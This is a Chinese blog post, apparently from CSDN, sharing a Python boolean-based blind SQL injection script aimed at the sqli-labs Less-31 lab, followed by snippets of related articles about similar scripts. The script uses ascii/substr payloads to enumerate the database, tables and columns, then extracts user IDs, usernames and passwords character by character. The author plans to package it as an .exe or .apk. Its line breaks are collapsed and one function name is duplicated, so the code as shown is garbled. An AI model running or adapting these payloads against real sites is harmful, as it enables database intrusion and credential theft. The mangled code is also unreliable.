python substr_python盲注

最新推荐文章于 2024-04-07 05:35:29 发布
最新推荐文章于 2024-04-07 05:35:29 发布
阅读量88 收藏
点赞数
文章标签: python substr
640给大家来一份python盲注的代码 640

我自己改了一些内容,到时候我把其封装成为.exe文件,或者.apk文件,再把资源发出来,接下来是代码

import requests# 爆数据库长度def db_length(url,s):
    db_length = 0    for i in range(1, 20):
        db_payload = "2%s and (length(database())=%d) --+" % (s,i)
        r = requests.get(url+db_payload)if "Your Login name:Angelina" in r.content.decode('utf-8'):print("数据库长度为:", i)
            db_length = ibreak    return db_length# 爆当前在使用的数据库名称def db_name(url,s):
    db_name = ''    for i in range(1, db_length(url,s)+1):for j in range(95, 123):
            db_payload = "2%s and (left(database(),%d)='%s') --+" % (s,i, db_name+chr(j))
            r = requests.get(url+db_payload)if "Your Login name:Angelina" in r.content.decode('utf-8'):
                db_name = db_name+chr(j)return db_name# 爆表数量def table_num(url,s):table_num = 0    for i in range(100):
        db_payload = "2%s and (select count(table_name) from information_schema.tables where table_schema='%s')=%d --+" %(s,'security', i)
        r = requests.get(url+db_payload)if "Your Login name:Angelina" in r.content.decode('utf-8'):
            table_nums = ibreak    return table_nums# 爆表名称,列表def tables_name(url,s):
    tables_name = []for i in range(4):#table_nums        k = 1        flag = 0        table_name = ''        while flag == 0:for j in range(95, 123):
                db_payload = "2%s and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d --+" % (s, i, k, j)
                r = requests.get(url+db_payload)if "Angelina" in r.content.decode('utf-8'):
                    k = k+1                    table_name = table_name+chr(j)break                elif j == 122:
                    flag = 1                    tables_name.append(table_name)break    return tables_namedef columns(url,s):print("当前扫描出的表:", end='')print(','.join(['emails', 'referers', 'uagents', 'users']))#tables_name    while True:print("请输入要扫描的表:", end='')
         table = input()if table in ['emails', 'referers', 'uagents', 'users']:break         else:print(" 输入错误,请重新输入 ")
    table_name = table
    column_num = 0    # 爆字段数量    for i in range(100):
        db_payload = ("2%s and "        "(select count(column_name) from information_schema.columns where table_schema=database() and table_name='%s')"        "=%d --+") % (s,table_name, i)
        r = requests.get(url+db_payload)if 'Angelina' in r.content.decode('utf-8'):
            column_num = ibreak    # print("该表共有", column_num, "个字段:", end='')    return column_num# 爆字段名称def columns_name(url,s):
    columns_name = []for i in range(3):#column_num        column_name = ''        k = 1        flag = 0        while flag == 0:for j in range(95, 123):
                db_payload = """2%s and                ascii(substr((select column_name from information_schema.columns                where table_schema=database() and table_name='%s'                limit %d,1 )                ,%d,1))=%d --+""" % (s,'users', i, k, j)
                r = requests.get(url+db_payload)if "Angelina" in r.content.decode('utf-8'):
                    k = k+1                    column_name = column_name+chr(j)break                elif j == 122:
                    flag = 1                    columns_name.append(column_name)break    # print(','.join(columns_name))    return columns_name
column_name=['id', 'username', 'password']# 爆数据数量def data_num(url,s):for i in range(20):
        db_payload = "2%s and (select count(%s) from %s)=%d --+" % (s,column_name[0], 'users', i)
        r = requests.get(url+db_payload)if "Angelina" in r.content.decode('utf-8'):
            data_num = i# print("该表共有", data_num, "个数据")            break    return data_num# 爆数据结果def data_num(url,s):
    user_id = []
    user_name = []
    user_pw = []for i in range(14):#data_num        # id        for k in range(20):
            db_payload = "2%s and (select %s from %s limit %d,1)=%d --+" % (s,column_name[0], 'users', i, k)
            r = requests.get(url+db_payload)if "Angelina" in r.content.decode('utf-8'):
                user_id.append(k)print("%2d" % k, end=' ')break        # username        un = ''        flag = 0        j = 1        while flag == 0:for k in range(48, 123):if k not in range(48, 58) and k not in range(65, 91) and k not in range(95, 123):continue                db_payload = "2%s and ascii(substr((select %s from %s limit %d,1),%d,1))=%d --+" % (s,column_name[1], 'users',i, j, k)
                r = requests.get(url+db_payload)if "Angelina" in r.content.decode('utf-8'):
                    un += chr(k)
                    j += 1                    break                if k == 122:
                    flag = 1                    user_name.append(un)print("%10s" % un, end=' ')break        # password        pw = ''        flag = 0        j = 1        while flag == 0:for k in range(33, 123):if k not in (33, 45, 64) and k not in range(48, 58) and k not in range(65, 91) and k not in range(95, 123):continue                db_payload = "2%s and ascii(substr((select %s from %s limit %d,1),%d,1))=%d --+" % (s,column_name[2],'users', i, j, k)
                r = requests.get(url + db_payload)if "Angelina" in r.content.decode('utf-8'):
                    pw += chr(k)
                    j += 1                    break                if k == 122:
                    flag = 1                    user_pw.append(pw)print("  ", pw)breakif __name__=='__main__':
    url='http://192.168.222.134:10808/Less-31/?id=1&id='    # print(db_length(url,"\")"))    # print(db_name(url,"\")"))    # print(table_num(url, "\")"))    #print(tables_name(url, "\")"))    #print(columns_name(url,"\")"))    print(data_num(url,"\")"))
weixin_39695306
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python-Sql盲注检测
weixin_57041250的博客
11-02 220
sql盲注分为布尔型盲注,时间型盲注
python-盲注
qq_41232519的博客
04-22 387
import requests import time #目标url url = 'http://192.168.8.152/sql/Less-1/?id=1' #查库语句 database = 'select schema_name from information_schema.schemata' #查当前表语句 table = 'select table_name from infor...
爱上python盲注探测脚本
dfdhxb995397的博客
09-13 161
  本文转自:i春秋论坛 前言:   最近在学python,做了个盲注的简单的跑用户的脚本,仅做个记录。   sqmap也有不灵的时候,有时需要根据情况自写脚本探测   正文:   本地用大表姐给的sql和php文件搭建了个布尔盲注的靶机   另外感谢大表姐的指导。   稍作解释:注入语句里用%s占位,等待在for循里面依次判断长度 [App...
Python编写盲注自动化脚本
qq_42990434的博客
05-14 1468
注入中盲注它要花费很多时间进行排除,所以作为小白的我也想尝试如何去编写简单的 python脚 本,来提高挖盲注的效率。 说到盲注的排除,我们第一时间就会想到二分法,因为不可能逐个逐个的用 “=” 去排除,这样浪费的时间会更多,所以脚本的编写我也是用二分法的,下面我会用自己盲注数据库名字的例子来说明一下: #!/usr/bin/env python # coding:utf-8 import requests import sys url = "http://xxx.xxx.xxx.xxx/xxx/xxx
python脚本实现sql时间盲注
wrypot的博客
03-27 731
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
php自定义中文字符串截取函数substr_for_gb2312及substr_for_utf8示例
10-22
主要介绍了php自定义中文字符串截取函数substr_for_gb2312及substr_for_utf8用法,结合实例形式分析了针对gb2312与utf-8编码的自定义中文字符串截取函数的实现与使用方法,需要的朋友可以参考下
php字符串替换函数substr_replace()用法实例
10-24
主要介绍了php字符串替换函数substr_replace()用法,实例分析了php中substr_replace函数的使用技巧,具有一定参考借鉴价值,需要的朋友可以参考下
Python如何应用cx_Oracle获取oracle中的clob字段问题
09-09
另外,有一种常见但可能导致错误的方法是使用`dbms_lob.substr`函数,如`dbms_lob.substr(clob字段,4000,1)`,这种方式在处理大文本时可能会报错,因为它尝试将整个CLOB转换为字符串,这可能导致缓冲区不足的问题。...
PHP中检索字符串的方法分析【strstr与substr_count方法】
10-20
主要介绍了PHP中检索字符串的方法,结合实例形式分析了strstr与substr_count函数的功能与具体使用技巧,需要的朋友可以参考下
PHP中substr_count()函数获取子字符串出现次数的方法
12-19
下面我们将详细介绍 `substr_count()` 函数的工作原理、参数及其使用方法。 函数定义: ```php substr_count(string, substring, start, length) ``` 其中: - `string`:必需,表示要检查的主字符串。 - `...
python实现sql盲注
箭雨镜屋
03-01 721
背景介绍 本文这段python代码之前发布在我的博客WebGoat (A1) SQL Injection (advanced)中,用于通过sql布尔盲注获取WebGoat SQL Injection (advanced)第5页的用户tom的密码。 代码比较简单 ,这里单独拎出来主要是为了自己以后查阅方便。如果遇到其他注入问题,可以简单修改headers,payload,以及response.text中检查的内容。如果以后代码有较大改动,便会更新本文。 代码 import requests ur
python脚本实现半自动化布尔盲注
weixin_44255856的博客
04-27 878
原文链接:http://zzqsmile.top/2018/06/04/python3/2018-06-04-布尔盲注/ from optparse import OptionParser import sys import requests import hashlib parser=OptionParser() parser.add_option("-D", "--database", a...
使用python进行sql布尔盲注exp的编写
CC210231的博客
04-04 2532
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3362
在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
pythonsql注入步骤_SQL注入 Sql注入之盲注
weixin_39578674的博客
11-30 264
只有生在黑暗里的蛾子才会知道黑暗的恐怖吧……飞在阳光里的蝴蝶,永远都不能明白。MySQL盲注基础当你注入测试,发现客户端没有报错,但是又存在注入的时候,不妨试一试盲注.盲注又分三种:1. 基于布尔SQL盲注2. 基于时间的SQL盲注3. 基于报错的SQL盲注盲注必知基础下面这些函数先弄清楚作用,然后判断的时候使用大于小于等于判断,如果判断为真页面就会返回正确的网页,否就返回错误的网页.left()...
时间盲注python脚本(二分查找优化)支持cookie注入
qq_36915061的博客
12-02 911
时间盲注python脚本(二分查找优化)支持cookie注入 菜鸟自用,仅供参考 使用说明 可根据用途更改payload中的select语句,字符型注入点有两种注入情况: 1、最后添加注释符 2、最后的字符添加单引号,与原语句中的单引号闭合 get_length和get_name可结合使用 可根据自己的猜解范围调整min和max import requests import dat...
盲注易错分析
oxygensss的博客
12-11 418
盲注易错回答分析 1.盲注中的substr()语法作用 用于截取字符串,语法为substr(字符串,位置,长度). 2.布尔型盲注原理 根据返回页面的正确与否,通过判断对应字符的ascii码值是否对应,来判断字符串具体的数值。 3.注入语句最后的 --是什么意思 起到一个注释后面语句的作用,防止对前面的语句产生干扰。 4.注入语句操作流程 首先用substr截取字符串,每次截取一个,用ascii()函数转化为ascii码,进行判断,如果不符合,返回页面错误,最后根据得到的ascii码来判断它的值 5.盲注
bool盲注中用到的截取字符串的函数(mid、substr、left)
weixin_30917213的博客
02-09 457
介绍一下常用的:mid、substr、left 1、mid()函数 此函数为截取字符串一部分。MID(column_name,start[,length]) 参数 描述 column_name 必需。要提取字符的字段。 start 必需。规定开始...
Python自动化sql注入:布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 819
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
substr_count()
最新发布
06-18
`substr_count()` 是 C++ 标准库中的一个字符串处理函数,它定义在 `<string>` 头文件中。这个函数用于计算一个字符串在另一个字符串中特定子串出现的次数。其基本语法如下: ```cpp size_t substr_count(const ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值